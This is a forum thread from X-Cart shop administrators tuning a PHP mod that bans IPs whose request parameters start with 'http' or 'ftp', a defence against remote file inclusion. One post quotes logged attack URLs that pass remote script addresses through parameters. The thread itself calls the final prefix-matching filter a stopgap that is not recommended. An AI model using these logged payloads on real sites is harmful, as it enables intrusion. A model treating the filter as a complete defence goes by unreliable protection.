X-Cart forums

[Scotty85]

I got it.... for those interested...

In /auth.php change this:

Quote:

if(strpos($v, 'http://')!==false) {

To this:

Quote:

if(strpos($v, 'http')!==false) {

Change:

Quote:

func_add_ip_to_slist($REMOTE_ADDR, 'H');

To this:

Quote:

func_add_ip_to_slist($REMOTE_ADDR, 'M');

Change:

Quote:

if($stop_list = func_query("SELECT * FROM $sql_tbl[stop_list] WHERE ip LIKE '$REMOTE_ADDR' AND reason = 'H'")) {

To this:

Quote:

if($stop_list = func_query("SELECT * FROM $sql_tbl[stop_list] WHERE ip LIKE '$REMOTE_ADDR' AND reason = 'M'")) {

Please note that this is AFTER you apply the patches from the original poster. (this is on a Windows 2003 server.... since it doesn't use the .htaccess file, this is easier than going into IIS everytime you wanna add a blocked IP)
The 'H' and 'M' reflect whichever admin account you normally use to add your blocked IPs. Having it the same as what the mod uses, it covers the ones you add manually as well.

Thanks again for a very cool mod!


Scotty

[Scotty85]

Just curious...

How would you add an "elseif" to that to make it be labeled differently from being done by Admin or by the mod? (how do you make it use 'M' or 'H')

[intel352]

Hi Scotty, a note, be careful blocking other statuses with the stop list. I created status H so that I could be certain only obvious hackers were totally banned from the site. If you use status M (which I believe stands for manual, correct?) that could pose some issues (not saying it *would*, just haven't looked into any ramifications, so just a word of warning is all)

Regarding checking for http by itself, that means if http is found anywhere in the string, they get banned, and it's probably easier to have http in the middle of a string, than http://. To be certain, I would check to ensure the first 4 letters appear as http


You mentioned, having an SEO mod used against you, howso?


Add an elseif for a different label? Can you describe that better?

[Scotty85]

Well... as I posted earlier, Windows servers do not use the .htaccess file at all. My understanding is that when something is added to the stop-list, xcart adds it to the .htaccess file. Is that wrong? In any case, my stop list never worked until your mod came along. At that point, while testing, I found that my manually added IPs still didn't get blocked, but yours actually works! I've always had to go into IIS and block IPs 1-by-1 or by group. Pretty monotinous. That's why I changed it to block status 'M' instead of 'H' YOURS works, xcart's doesn't. This GREATLY simplifies blocking malicious IPs for me.

As for the label, your mod labels it nicely as a hacker attempt. When adding an IP MANUALLY, it just says "Added by Administrator". I wanted a way (since I'm blocking the manually added IPs as well with your mod) to have blocked IPs that were added automatically by the mod to be labled as hacker attempts like you have it.... and the manually added ones to say "added by administrator". By changing the H to M, it labels the automatically added IPs by your mod as "Added by Administrator". The same as a manual add. I want to separate the two and have different labels. But remember, with the way I changed it to work for me on our W2k3 server, ALL blocked IPs are called by M. I wanted them to show in the list as blocked by whoever blocked them (the mod, or manually)

Hope this makes sense...

[intel352]

Hi Scotty, .htaccess is not modified by the StopList module

Additionally, the StopList module is originally intended to block people from the cart, not from the website. My code just hijacked the module a bit to ban hackers from the site more easily.

Regarding the H vs M, in auth.php, change the SQL statement to the following:

PHP Code:

if($stop_list = func_query("SELECT * FROM $sql_tbl[stop_list] WHERE ip LIKE '$REMOTE_ADDR' AND (reason = 'H' OR reason = 'M') ")) { 


Also, revert the part that bans them, back to how it was:

PHP Code:

func_add_ip_to_slist($REMOTE_ADDR, 'H'); 


And change the strpos bit, to this (to only match http, and ftp, at the beginning of the string):

PHP Code:

if(substr($v, 0, 4)=='http' || substr($v, 0, 3)=='ftp') { 


[Scotty85]

Very nice. Works perfectly for me. Thanks for the clarificaton on the stop list too. I think I was reading a thread about a mod that added the IPs to the .htaccess file. Musta got that confused. Sorry.

By reading your last post, is it safe to assume (ya... I know...) that you could effectively add any flag you wanted?

PHP Code:

if(substr($v, 0, 4)=='http' || substr($v, 0, 3)=='ftp' || substr($v, 0, 6)=='HACKER') { 


Or is that all wrong and I should go play with crayons in the corner.

[intel352]

lol, yes, you can use any flag you feel like defining, it will determine them a hacker based on the flag, and ban them.

[Scotty85]

Is my syntax correct in the above post?

[Scotty85]

I just got a bunch of these and they were not blocked. Can you take a look and see if there's something we need to change in the mod?

Quote:

Unregistered customer 06-06-2008
12:19:50 06-06-2008
12:19:50 .../home.php?js=http%3A%2F%2Fwww.heaven-house.kz%2Ftemplates_c%2Fomoj%2Fedexuq%2F
Unregistered customer 06-06-2008
12:19:52 06-06-2008
12:19:52 .../home.php?js=http%3A%2F%2Fwww.tureksfuar.com.tr%2Fy eni%2Faxiyeba%2Ftebe%2F
Unregistered customer 06-06-2008
12:19:54 06-06-2008
12:19:54 .../home.php?js=http%3A%2F%2Fwww.psikolojikyardim.org% 2Fetkinlik%2Finclude%2Feto%2Frix%2Fjas%2F
Unregistered customer 06-06-2008
12:19:55 06-06-2008
12:19:55 .../manufacturers.php?manufacturerid=304&page=1
Unregistered customer 06-06-2008
12:19:58 06-06-2008
12:19:58 .../manufacturers.php?manufacturerid=http%3A%2F%2Fwww. eddufresne.org%2Fcomponents%2Fkill.com_calendar.ba ckup.kill%2Fkill.ezi.kill%2Foye%2Fekasu%2F&catid=3 97&dsefu=off
Unregistered customer 06-06-2008
12:19:58 06-06-2008
12:19:58 .../manufacturers.php?manufacturerid=http%3A%2F%2Fwww. foicr.org%2Fwork%2Fmulito%2Fyiqosu%2F&catid=397&ds efu=off
Unregistered customer 06-06-2008
12:32:02 06-06-2008
12:39:45 .../product.php?productid=36186
Unregistered customer 06-06-2008
12:48:23 06-06-2008
12:48:23 .../home.php?cat=444&page=1
Unregistered customer 06-06-2008
12:46:30 06-06-2008
12:46:30 .../product.php?productid=23370
Unregistered customer 06-06-2008
12:19:46 06-06-2008
12:19:46 .../help.php?section=contactus&mode=http%3A%2F%2Fwww.u xbridgerotary.org%2Fsurvey%2Ftmp%2Fisefa%2Fnowu%2F yocav%2F
Unregistered customer 06-06-2008
12:19:48 06-06-2008
12:19:48 .../help.php?section=contactus&mode=http%3A%2F%2Fwww.n orthfans.ch%2Fforum%2Fadmin%2Fsettings%2Focoyo%2Fs er%2F
Unregistered customer 06-06-2008
12:19:49 06-06-2008
12:19:49 .../help.php?section=contactus&mode=http%3A%2F%2Fwww.b lankner.ocps.net%2Fmedia%2Fyeloc%2Frepaw%2F

Update:
This seems to have taken care of all of it for now. Since none of these are ever used with HTTP in them in this way, I'm pretty sure they're all ok to use. I've bounced all over my site, clicked on froogle links and all..... everything seems to be working fine. I'll add to it as needed.

PHP Code:

if(substr($v, 0, 4)=='http' || substr($v, 0, 19)=='manufacturerid=http' || substr($v, 0, 9)=='mode=http' || substr($v, 0, 7)=='js=http' || substr($v, 0, 12)=='section=http' || substr($v, 0, 8)=='cat=http' || substr($v, 0, 10)=='catid=http' || substr($v, 0, 10)=='dsefu=http' || substr($v, 0, 9)=='page=http') { 


[intel352]

doh, my bad, I was thinking the code was different. While your solution works for now, it's not recommended. I'll post back in a bit with a better solution (I'm upgrading a client site at the moment tho, so it'll be a bit)